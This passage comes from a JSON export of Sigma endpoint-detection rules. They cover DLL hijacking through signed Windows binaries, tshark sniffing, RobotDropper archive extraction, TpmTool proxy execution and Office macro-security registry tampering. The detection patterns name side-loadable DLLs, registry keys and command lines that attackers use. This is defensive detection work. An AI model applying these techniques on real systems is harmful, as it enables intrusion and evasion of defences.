other files to a compromised environment using legitimate tool to evade detection.\nIt is recommended to check the content of the downloaded file and for other suspicious behavior by the parents of the current process.\n", "rule_creation_date": "2025-06-17", "rule_modified_date": "2025-06-17", "rule_os": "windows", "rule_status": null, "rule_tactic_tags": [ "attack.command_and_control", "attack.defense_evasion" ], "rule_technique_tags": [ "attack.t1105", "attack.t1218" ], "warnings": null, "errors": null, "declared_in": null, "source": "0950c540-b155-4054-9b93-8fb2888de6ed" } { "id": "3076adfe-ea41-40f9-84c8-262457ee7219", "test_maturity_current_count": 0, "test_maturity_delay": 7, "test_maturity_threshold": 10, "global_state": "alert", "effective_state": "alert", "rule_effective_level": "high", "rule_effective_confidence": "strong", "alert_count": 0, "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", "rule_level_overridden": false, "whitelist_count": 0, "last_modifier": { "id": 1, "username": "system_supervisor" }, "endpoint_detection": true, "backend_detection": false, "origin_stack": { "id": "b8e2fe4fc90e4d08", "name": null, "is_current": false, "is_supervisor": true, "is_tenant": false }, "tenant": "b8e2fe4fc90e4d08", "rule_is_depended_on": [], "rule_type": "sigma_rule", "origin_stack_id": "b8e2fe4fc90e4d08", "last_update": "2026-03-23T11:45:34.594714Z", "creation_date": "2026-03-23T11:45:34.594717Z", "enabled": true, "hl_status": "stable", "hl_testing_start_time": "2026-03-23T11:45:34.594725Z", "rule_level": "high", "rule_confidence": "strong", "rule_confidence_override": null, "references": [ "https://wietze.github.io/blog/save-the-environment-variables", "https://securityintelligence.com/posts/windows-features-dll-sideloading/", "https://github.com/xforcered/WFH", "https://attack.mitre.org/techniques/T1574/001/" ], "name": "t1574_001_dll_hijacking_cacls.yml", "content": "title: DLL Hijacking via CACLS.exe\nid: 3076adfe-ea41-40f9-84c8-262457ee7219\ndescription: |\n Detects potential Windows DLL Hijacking via CACLS.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://wietze.github.io/blog/save-the-environment-variables\n - https://securityintelligence.com/posts/windows-features-dll-sideloading/\n - https://github.com/xforcered/WFH\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/09/15\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'CACLS.EXE'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith: '\\ntmarta.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Program Files (x86)\\Google\\Chrome\\Application\\'\n - '?:\\Program Files (x86)\\Microsoft\\EdgeWebView\\Application\\\\*\\'\n - '?:\\Program Files (x86)\\Microsoft\\Edge\\Application\\'\n - '?:\\Program Files\\Google\\Chrome\\Application\\'\n - '?:\\Program Files\\Microsoft\\EdgeWebView\\Application\\\\*\\'\n - '?:\\Program Files\\Microsoft\\Edge\\Application\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n", "block_on_agent": false, "quarantine_on_agent": false, "rule_level_override": null, "rule_id": "3076adfe-ea41-40f9-84c8-262457ee7219", "rule_name": "DLL Hijacking via CACLS.exe", "rule_description": "Detects potential Windows DLL Hijacking via CACLS.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n", "rule_creation_date": "2022-09-15", "rule_modified_date": "2025-07-11", "rule_os": "windows", "rule_status": null, "rule_tactic_tags": [ "attack.defense_evasion", "attack.persistence", "attack.privilege_escalation" ], "rule_technique_tags": [ "attack.t1574.001" ], "warnings": null, "errors": null, "declared_in": null, "source": "0950c540-b155-4054-9b93-8fb2888de6ed" } { "id": "307b0642-85e4-4475-95de-240e2cbc5108", "test_maturity_current_count": 0, "test_maturity_delay": 7, "test_maturity_threshold": 10, "global_state": "alert", "effective_state": "alert", "rule_effective_level": "high", "rule_effective_confidence": "strong", "alert_count": 0, "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", "rule_level_overridden": false, "whitelist_count": 0, "last_modifier": { "id": 1, "username": "system_supervisor" }, "endpoint_detection": true, "backend_detection": false, "origin_stack": { "id": "b8e2fe4fc90e4d08", "name": null, "is_current": false, "is_supervisor": true, "is_tenant": false }, "tenant": "b8e2fe4fc90e4d08", "rule_is_depended_on": [], "rule_type": "sigma_rule", "origin_stack_id": "b8e2fe4fc90e4d08", "last_update": "2026-03-23T11:45:34.618890Z", "creation_date": "2026-03-23T11:45:34.618892Z", "enabled": true, "hl_status": "stable", "hl_testing_start_time": "2026-03-23T11:45:34.618896Z", "rule_level": "high", "rule_confidence": "strong", "rule_confidence_override": null, "references": [ "https://securityintelligence.com/posts/windows-features-dll-sideloading/", "https://github.com/xforcered/WFH", "https://attack.mitre.org/techniques/T1574/001/" ], "name": "t1574_001_dll_hijacking_bitlockerwizard.yml", "content": "title: DLL Hijacking via BitLockerWizard.exe\nid: 307b0642-85e4-4475-95de-240e2cbc5108\ndescription: |\n Detects potential Windows DLL Hijacking via BitLockerWizard.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://securityintelligence.com/posts/windows-features-dll-sideloading/\n - https://github.com/xforcered/WFH\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/09/15\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'BitLockerWizard.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith: '\\fvewiz.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n", "block_on_agent": false, "quarantine_on_agent": false, "rule_level_override": null, "rule_id": "307b0642-85e4-4475-95de-240e2cbc5108", "rule_name": "DLL Hijacking via BitLockerWizard.exe", "rule_description": "Detects potential Windows DLL Hijacking via BitLockerWizard.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n", "rule_creation_date": "2022-09-15", "rule_modified_date": "2025-07-11", "rule_os": "windows", "rule_status": null, "rule_tactic_tags": [ "attack.defense_evasion", "attack.persistence", "attack.privilege_escalation" ], "rule_technique_tags": [ "attack.t1574.001" ], "warnings": null, "errors": null, "declared_in": null, "source": "0950c540-b155-4054-9b93-8fb2888de6ed" } { "id": "3085e5ea-4be0-4a6c-b0e8-442cc81ed08f", "test_maturity_current_count": 0, "test_maturity_delay": 7, "test_maturity_threshold": 10, "global_state": "alert", "effective_state": "alert", "rule_effective_level": "high", "rule_effective_confidence": "strong", "alert_count": 0, "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", "rule_level_overridden": false, "whitelist_count": 0, "last_modifier": { "id": 1, "username": "system_supervisor" }, "endpoint_detection": true, "backend_detection": false, "origin_stack": { "id": "b8e2fe4fc90e4d08", "name": null, "is_current": false, "is_supervisor": true, "is_tenant": false }, "tenant": "b8e2fe4fc90e4d08", "rule_is_depended_on": [], "rule_type": "sigma_rule", "origin_stack_id": "b8e2fe4fc90e4d08", "last_update": "2026-03-23T11:45:34.094233Z", "creation_date": "2026-03-23T11:45:34.094235Z", "enabled": true, "hl_status": "stable", "hl_testing_start_time": "2026-03-23T11:45:34.094239Z", "rule_level": "high", "rule_confidence": "strong", "rule_confidence_override": null, "references": [ "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1040/T1040.md#atomic-test-3---packet-capture-macos-using-tcpdump-or-tshark", "https://attack.mitre.org/techniques/T1040/" ], "name": "t1040_network_sniffing_tshark_macos.yml", "content": "title: Network Sniffed via tshark (macOS)\nid: 3085e5ea-4be0-4a6c-b0e8-442cc81ed08f\ndescription: |\n Detects the execution of tshark, a protocol analyzer used to capture and analyze network traffic.\n It is often used to help troubleshoot network issues, but adversaries can use it to sniff network traffic and capture information about an environment, including authentication material passed over the network.\n It is recommended to investigate activity surrounding this alert to determine if the usage of this software is legitimate.\nreferences:\n - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1040/T1040.md#atomic-test-3---packet-capture-macos-using-tcpdump-or-tshark\n - https://attack.mitre.org/techniques/T1040/\ndate: 2024/05/10\nmodified: 2025/04/14\nauthor: HarfangLab\ntags:\n - attack.credential_access\n - attack.discovery\n - attack.t1040\n - classification.macOS.Source.ProcessCreation\n - classification.macOS.Tool.Tshark\n - classification.macOS.Behavior.SensitiveInformation\n - classification.macOS.Behavior.CredentialAccess\nlogsource:\n category: process_creation\n product: macos\ndetection:\n selection:\n Image|endswith: '/tshark'\n\n exclusion_cellar_data_analysis:\n ParentImage|endswith: 'opt/homebrew/Cellar/python@3.??/3.*/Frameworks/Python.framework/Versions/3.??/Resources/Python.app/Contents/MacOS/Python'\n\n condition: selection and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n", "block_on_agent": false, "quarantine_on_agent": false, "rule_level_override": null, "rule_id": "3085e5ea-4be0-4a6c-b0e8-442cc81ed08f", "rule_name": "Network Sniffed via tshark (macOS)", "rule_description": "Detects the execution of tshark, a protocol analyzer used to capture and analyze network traffic.\nIt is often used to help troubleshoot network issues, but adversaries can use it to sniff network traffic and capture information about an environment, including authentication material passed over the network.\nIt is recommended to investigate activity surrounding this alert to determine if the usage of this software is legitimate.\n", "rule_creation_date": "2024-05-10", "rule_modified_date": "2025-04-14", "rule_os": "macos", "rule_status": null, "rule_tactic_tags": [ "attack.credential_access", "attack.discovery" ], "rule_technique_tags": [ "attack.t1040" ], "warnings": null, "errors": null, "declared_in": null, "source": "0950c540-b155-4054-9b93-8fb2888de6ed" } { "id": "309b6676-766c-4e8f-9570-9385f7522c2e", "test_maturity_current_count": 0, "test_maturity_delay": 7, "test_maturity_threshold": 10, "global_state": "alert", "effective_state": "alert", "rule_effective_level": "high", "rule_effective_confidence": "weak", "alert_count": 0, "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", "rule_level_overridden": false, "whitelist_count": 0, "last_modifier": { "id": 1, "username": "system_supervisor" }, "endpoint_detection": true, "backend_detection": false, "origin_stack": { "id": "b8e2fe4fc90e4d08", "name": null, "is_current": false, "is_supervisor": true, "is_tenant": false }, "tenant": "b8e2fe4fc90e4d08", "rule_is_depended_on": [], "rule_type": "sigma_rule", "origin_stack_id": "b8e2fe4fc90e4d08", "last_update": "2026-03-23T11:45:34.604123Z", "creation_date": "2026-03-23T11:45:34.604126Z", "enabled": true, "hl_status": "stable", "hl_testing_start_time": "2026-03-23T11:45:34.604134Z", "rule_level": "high", "rule_confidence": "weak", "rule_confidence_override": null, "references": [ "https://blogs.blackberry.com/en/2024/11/robotdropper-automates-delivery-of-multiple-infostealers", "https://trac-labs.com/advancing-through-the-cyberfront-legionloader-commander-6af38ebe39d4" ], "name": "t1560_001_unrar_decompress_robotdropper.yml", "content": "title: RobotDropper Archiver Tool Execution\nid: 309b6676-766c-4e8f-9570-9385f7522c2e\ndescription: |\n Detects when the archiver tool WinRAR is used with arguments specific to RobotDropper.\n These parameters are used by threat actors to uncompress the password protected archive containing the payload.\n The payload is usually a Dll used for DLL Side-Loading.\nreferences:\n - https://blogs.blackberry.com/en/2024/11/robotdropper-automates-delivery-of-multiple-infostealers\n - https://trac-labs.com/advancing-through-the-cyberfront-legionloader-commander-6af38ebe39d4\ndate: 2025/01/08\nmodified: 2025/06/30\nauthor: HarfangLab\ntags:\n - attack.collection\n - attack.t1560\n - attack.t1560.001\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Loader.RobotDropper\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection_rar:\n CommandLine|contains: '*\\AppData\\Roaming\\\\*\\unrar.exe x -p* -o+ *.rar'\n ParentImage: '?:\\Windows\\System32\\msiexec.exe'\n\n selection_7z:\n CommandLine|contains: '*\\AppData\\Roaming\\\\*\\7z.exe x *\\AppData\\Roaming\\\\* -oC*\\AppData\\Roaming\\\\* -y -p*'\n GrandparentImage: '?:\\Windows\\System32\\msiexec.exe'\n condition: 1 of selection_*\nlevel: high\nconfidence: weak", "block_on_agent": false, "quarantine_on_agent": false, "rule_level_override": null, "rule_id": "309b6676-766c-4e8f-9570-9385f7522c2e", "rule_name": "RobotDropper Archiver Tool Execution", "rule_description": "Detects when the archiver tool WinRAR is used with arguments specific to RobotDropper.\nThese parameters are used by threat actors to uncompress the password protected archive containing the payload.\nThe payload is usually a Dll used for DLL Side-Loading.\n", "rule_creation_date": "2025-01-08", "rule_modified_date": "2025-06-30", "rule_os": "windows", "rule_status": null, "rule_tactic_tags": [ "attack.collection" ], "rule_technique_tags": [ "attack.t1560", "attack.t1560.001" ], "warnings": null, "errors": null, "declared_in": null, "source": "0950c540-b155-4054-9b93-8fb2888de6ed" } { "id": "30bfe7ff-3444-4e5a-9e30-cb0e5a88ff28", "test_maturity_current_count": 0, "test_maturity_delay": 7, "test_maturity_threshold": 10, "global_state": "alert", "effective_state": "alert", "rule_effective_level": "medium", "rule_effective_confidence": "strong", "alert_count": 0, "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", "rule_level_overridden": false, "whitelist_count": 0, "last_modifier": { "id": 1, "username": "system_supervisor" }, "endpoint_detection": true, "backend_detection": false, "origin_stack": { "id": "b8e2fe4fc90e4d08", "name": null, "is_current": false, "is_supervisor": true, "is_tenant": false }, "tenant": "b8e2fe4fc90e4d08", "rule_is_depended_on": [], "rule_type": "sigma_rule", "origin_stack_id": "b8e2fe4fc90e4d08", "last_update": "2026-03-23T11:45:34.088132Z", "creation_date": "2026-03-23T11:45:34.088134Z", "enabled": true, "hl_status": "stable", "hl_testing_start_time": "2026-03-23T11:45:34.088138Z", "rule_level": "medium", "rule_confidence": "strong", "rule_confidence_override": null, "references": [ "https://twitter.com/0gtweet/status/1581185123218690048", "https://attack.mitre.org/techniques/T1218/" ], "name": "t1218_tpmtool.yml", "content": "title: Proxy Execution via TpmTool.exe\nid: 30bfe7ff-3444-4e5a-9e30-cb0e5a88ff28\ndescription: |\n Detects the suspicious execution of TpmTool.exe as a proxy to launch another application.\n Attackers must place a malicious logman.exe file in the same folder as TpmTool, which will then be executed.\n This technique can be used to bypass security restrictions that are based on the parent process.\n It is recommended to analyze the the execution chain to look for malicious processes as well as to analyze the logman.exe process and determine its legitimacy.\nreferences:\n - https://twitter.com/0gtweet/status/1581185123218690048\n - https://attack.mitre.org/techniques/T1218/\ndate: 2022/10/27\nmodified: 2025/01/13\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1218\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.LOLBin.TpmTool\n - classification.Windows.Behavior.ProxyExecution\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection_grandparent:\n GrandparentCommandLine|contains|all:\n - 'drivertracing'\n - 'stop'\n\n selection_parent:\n ParentCommandLine|endswith: '\\cmd.exe /c logman.exe stop TPMTRACE -ets'\n\n filter_legitimate:\n OriginalFileName: 'Logman.exe'\n Signed: 'true'\n Signature: 'Microsoft Windows'\n\n condition: all of selection_* and not 1 of filter_*\nlevel: medium\nconfidence: strong\n", "block_on_agent": false, "quarantine_on_agent": false, "rule_level_override": null, "rule_id": "30bfe7ff-3444-4e5a-9e30-cb0e5a88ff28", "rule_name": "Proxy Execution via TpmTool.exe", "rule_description": "Detects the suspicious execution of TpmTool.exe as a proxy to launch another application.\nAttackers must place a malicious logman.exe file in the same folder as TpmTool, which will then be executed.\nThis technique can be used to bypass security restrictions that are based on the parent process.\nIt is recommended to analyze the the execution chain to look for malicious processes as well as to analyze the logman.exe process and determine its legitimacy.\n", "rule_creation_date": "2022-10-27", "rule_modified_date": "2025-01-13", "rule_os": "windows", "rule_status": null, "rule_tactic_tags": [ "attack.defense_evasion" ], "rule_technique_tags": [ "attack.t1218" ], "warnings": null, "errors": null, "declared_in": null, "source": "0950c540-b155-4054-9b93-8fb2888de6ed" } { "id": "310c3bfc-817d-4a9b-bcb8-d1c7a7835b67", "test_maturity_current_count": 0, "test_maturity_delay": 7, "test_maturity_threshold": 10, "global_state": "alert", "effective_state": "alert", "rule_effective_level": "high", "rule_effective_confidence": "strong", "alert_count": 0, "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", "rule_level_overridden": false, "whitelist_count": 0, "last_modifier": { "id": 1, "username": "system_supervisor" }, "endpoint_detection": true, "backend_detection": false, "origin_stack": { "id": "b8e2fe4fc90e4d08", "name": null, "is_current": false, "is_supervisor": true, "is_tenant": false }, "tenant": "b8e2fe4fc90e4d08", "rule_is_depended_on": [], "rule_type": "sigma_rule", "origin_stack_id": "b8e2fe4fc90e4d08", "last_update": "2026-03-23T11:45:34.588794Z", "creation_date": "2026-03-23T11:45:34.588797Z", "enabled": true, "hl_status": "stable", "hl_testing_start_time": "2026-03-23T11:45:34.588805Z", "rule_level": "high", "rule_confidence": "strong", "rule_confidence_override": null, "references": [ "https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows", "https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/", "https://attack.mitre.org/techniques/T1574/001/" ], "name": "t1574_001_dll_hijacking_cmdl32.yml", "content": "title: DLL Hijacking via cmdl32.exe\nid: 310c3bfc-817d-4a9b-bcb8-d1c7a7835b67\ndescription: |\n Detects potential Windows DLL Hijacking via cmdl32.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'cmdl32.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\Cabinet.dll'\n - '\\cmpbk32.dll'\n - '\\RASAPI32.dll'\n - '\\rasman.dll'\n - '\\WINHTTP.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n", "block_on_agent": false, "quarantine_on_agent": false, "rule_level_override": null, "rule_id": "310c3bfc-817d-4a9b-bcb8-d1c7a7835b67", "rule_name": "DLL Hijacking via cmdl32.exe", "rule_description": "Detects potential Windows DLL Hijacking via cmdl32.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n", "rule_creation_date": "2021-12-10", "rule_modified_date": "2025-07-11", "rule_os": "windows", "rule_status": null, "rule_tactic_tags": [ "attack.defense_evasion", "attack.persistence", "attack.privilege_escalation" ], "rule_technique_tags": [ "attack.t1574.001" ], "warnings": null, "errors": null, "declared_in": null, "source": "0950c540-b155-4054-9b93-8fb2888de6ed" } { "id": "3173c69e-b742-4068-89fd-0dcb22d5d4d1", "test_maturity_current_count": 0, "test_maturity_delay": 7, "test_maturity_threshold": 10, "global_state": "alert", "effective_state": "alert", "rule_effective_level": "medium", "rule_effective_confidence": "weak", "alert_count": 0, "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", "rule_level_overridden": false, "whitelist_count": 0, "last_modifier": { "id": 1, "username": "system_supervisor" }, "endpoint_detection": true, "backend_detection": false, "origin_stack": { "id": "b8e2fe4fc90e4d08", "name": null, "is_current": false, "is_supervisor": true, "is_tenant": false }, "tenant": "b8e2fe4fc90e4d08", "rule_is_depended_on": [], "rule_type": "sigma_rule", "origin_stack_id": "b8e2fe4fc90e4d08", "last_update": "2026-03-23T11:45:34.093500Z", "creation_date": "2026-03-23T11:45:34.093502Z", "enabled": true, "hl_status": "stable", "hl_testing_start_time": "2026-03-23T11:45:34.093507Z", "rule_level": "medium", "rule_confidence": "weak", "rule_confidence_override": null, "references": [ "https://unit42.paloaltonetworks.com/unit42-gorgon-group-slithering-nation-state-cybercrime/", "https://www.mdsec.co.uk/2020/11/a-fresh-outlook-on-mail-based-persistence/" ], "name": "t1562_001_office_disable_security_policy.yml", "content": "title: Microsoft Office Security Policy Disabled\nid: 3173c69e-b742-4068-89fd-0dcb22d5d4d1\ndescription: |\n Detects when policy regarding Office applications security is set to disabled.\n This rule is triggered when:\n - macro execution policy is set to allow any macro (signed and unsigned) to execute automatically.\n - a protected view policy is set to be disabled for all documents.\n Some attackers set those values upon compromising endpoints to ease further exploitations in the future.\n It is recommended to investigate the process that set the registry key for suspicious activities.\nreferences:\n - https://unit42.paloaltonetworks.com/unit42-gorgon-group-slithering-nation-state-cybercrime/\n - https://www.mdsec.co.uk/2020/11/a-fresh-outlook-on-mail-based-persistence/\ndate: 2020/09/28\nmodified: 2025/04/24\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1562.001\n - attack.t1112\n - classification.Windows.Source.Registry\n - classification.Windows.Behavior.ImpairDefenses\n - classification.Windows.Behavior.SystemModification\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: registry_event\ndetection:\n selection:\n EventType: SetValue\n Details: 'DWORD (0x00000001)' # value 1 == No Security checks for macros (Not recommended, code in all documents can run)\n TargetObject:\n # covers \\office\\12.0/14.0/16.0... \\Word / Excel\\Security\\VBAWarnings\n - 'HKU\\\\*\\Software\\Microsoft\\Office\\\\*\\Security\\VBAWarnings'\n # disable Protected View for files downloaded from the internet.\n - 'HKU\\\\*\\Software\\Microsoft\\Office\\\\*\\Security\\ProtectedView\\DisableInternetFilesInPV'\n # disable Protected View for files located in unsafe locations (temporary directories,...)\n - 'HKU\\\\*\\Software\\Microsoft\\Office\\\\*\\Security\\ProtectedView\\DisableUnsafeLocationsInPV'\n # disable Protected View for files containing attachements.\n - 'HKU\\\\*\\Software\\Microsoft\\Office\\\\*\\Security\\ProtectedView\\DisableAttachementsInPV'\n # enable all macros without warns.\n - 'HKU\\\\*\\Software\\Microsoft\\Office\\\\*\\Security\\Level'\n\n # For office we detect only if the modification is related to a suspicious action (via a macro for example)\n selection_office:\n ProcessOriginalFileName:\n - 'Excel.exe'\n - 'Lync.exe'\n - 'MSACCESS.EXE'\n - 'OneNote.exe'\n - 'Outlook.exe'\n - 'POWERPNT.EXE'\n - 'WinWord.exe'\n ProcessSigned: 'true'\n ProcessSignature : 'Microsoft Corporation'\n\n filter_office_ui:\n StackTrace|contains: '\\Mso??UIwin32client.dll!'\n\n exclusion_services:\n Image|endswith:\n - '\\windows\\system32\\svchost.exe'\n - '\\windows\\syswow64\\svchost.exe'\n - '\\windows\\system32\\services.exe'\n\n exclusion_windowsupdate:\n Image: '?:\\$WINDOWS.~BT\\Sources\\setuphost.exe'\n ProcessParentImage:\n - '*\\WindowsUpdateBox.exe'\n - '*\\sources\\setupprep.exe'\n\n exclusion_citrix_profile_manager:\n Image: '?:\\Program Files\\Citrix\\User Profile Manager\\UserProfileManager.exe'\n\n exclusion_ivanti:\n Image:\n - '?:\\Program Files (x86)\\Ivanti\\Workspace Control\\pfwsmgr.exe'\n - '?:\\Program Files (x86)\\Ivanti\\Workspace Control\\pwrgrid.exe'\n - '?:\\Program Files\\Ivanti\\Ivanti Cloud Agent\\UWM_AC_ENGINE.WIN64\\AMAgent.exe'\n\n exclusion_sagekey:\n Image: '?:\\Program Files (x86)\\Common Files\\Sagekey Software\\StartAccess_2003.exe'\n\n exclusion_ecscad:\n Image: '?:\\Program Files\\MuM MT\\ecscad 2016\\ecscad\\EcsController.exe'\n\n exclusion_msaaccess:\n Image|endswith: '\\MSACCESS.EXE'\n ProcessParentImage|endswith: '\\MSACCESS*.EXE'\n ProcessGrandparentImage|endswith: '\\e.magnus.exe'\n\n exclusion_intersystems:\n ProcessOriginalFileName: 'CWS.exe'\n\n exclusion_share:\n ProcessProcessName:\n - 'reg.exe'\n - 'regedit.exe'\n - 'cscript.exe'\n ProcessCommandLine|contains: '\\\\\\\\'\n\n exclusion_res_software:\n ProcessParentImage: '?:\\Program Files (x86)\\RES Software\\Workspace Manager\\pfwsmgr.exe'\n\n exclusion_magnus:\n ProcessGrandparentImage: '?:\\Program Files (x86)\\BL\\BL\\bin\\e.magnus.exe'\n\n exclusion_loadstate:\n ProcessOriginalFileName: 'LoadState.exe'\n ProcessSigned: 'true'\n ProcessSignature : 'Microsoft Corporation'\n\n exclusion_aucotec:\n ProcessImage: '?:\\Program Files (x86)\\Aucotec\\Engineering Base *\\bin\\EngineeringBase.exe'\n ProcessSigned: 'true'\n ProcessSignature : 'AUCOTEC AG'\n\n exclusion_natus:\n ProcessOriginalFileName:\n - 'Wave.exe'\n - 'XLDB.EXE'\n ProcessSigned: 'true'\n ProcessSignature : 'Natus Medical Incorporated'\n\n exclusion_immidio:\n ProcessParentImage: '?:\\Program Files\\Immidio\\Flex Profiles\\FlexService.exe'\n\n condition: ((selection and not selection_office) or (selection and selection_office and not filter_office_ui)) and not 1 of exclusion_*\nlevel: medium\nconfidence: weak\n", "block_on_agent": false, "quarantine_on_agent": false, "rule_level_override": null, "rule_id": "3173c69e-b742-4068-89fd-0dcb22d5d4d1", "rule_name": "Microsoft Office Security Policy Disabled", "rule_description": "Detects when policy regarding Office applications security is set to disabled.\nThis rule is triggered when:\n - macro execution policy is set to allow any macro (signed and unsigned) to execute automatically.\n - a protected view policy is set to be disabled for all documents.\nSome attackers set those values upon compromising endpoints to ease further exploitations in the future.\nIt is recommended to investigate the process that set the registry key for suspicious activities.\n", "rule_creation_date": "2020-09-28", "rule_modified_date": "2025-04-24", "rule_os": "windows", "rule_status": null, "rule_tactic_tags": [ "attack.defense_evasion" ], "rule_technique_tags": [ "attack.t1112", "attack.t1562.001" ], "warnings": null, "errors": null, "declared_in": null, "source": "0950c540-b155-4054-9b93-8fb2888de6ed" } { "id": "31777514-089e-478f-8335-ce2e3f30e79e", "test_maturity_current_count": 0, "test_maturity_delay": 7, "test_maturity_threshold": 10, "global_state": "alert", "effective_state": "alert", "rule_effective_level": "critical", "rule_effective_confidence": "strong", "alert_count": 0, "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", "rule_level_overridden": false, "whitelist_count": 0, "last_modifier": { "id": 1, "username": "system_supervisor" }, "endpoint_detection": true, "backend_detection": false, "origin_stack": { "id": "b8e2fe4fc90e4d08", "name": null, "is_current": false, "is_supervisor": true, "is_tenant": false }, "tenant": "b8e2fe4fc90e4d08", "rule_is_depended_on": [], "rule_type": "sigma_rule", "origin_stack_id": "b8e2fe4fc90e4d08", "last_update": "2026-03-23T11:45:34.597347Z", "creation_date": "2026-03-23T11:45:34.597353Z", "enabled": true, "hl_status": "stable", "hl_testing_start_time": "2026-03-23T11:45:34.597364Z", "rule_level": "critical", "rule_confidence": "strong", "rule_confidence_override": null, "references": [ "https://man7.org/linux/man-pages/man1/rm.1.html", "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.004/T1070.004.md#atomic-test-8---delete-filesystem---linux", "https://attack.mitre.org/techniques/T1485/", "https://attack.mitre.org/techniques/T1070/004/" ], "name": 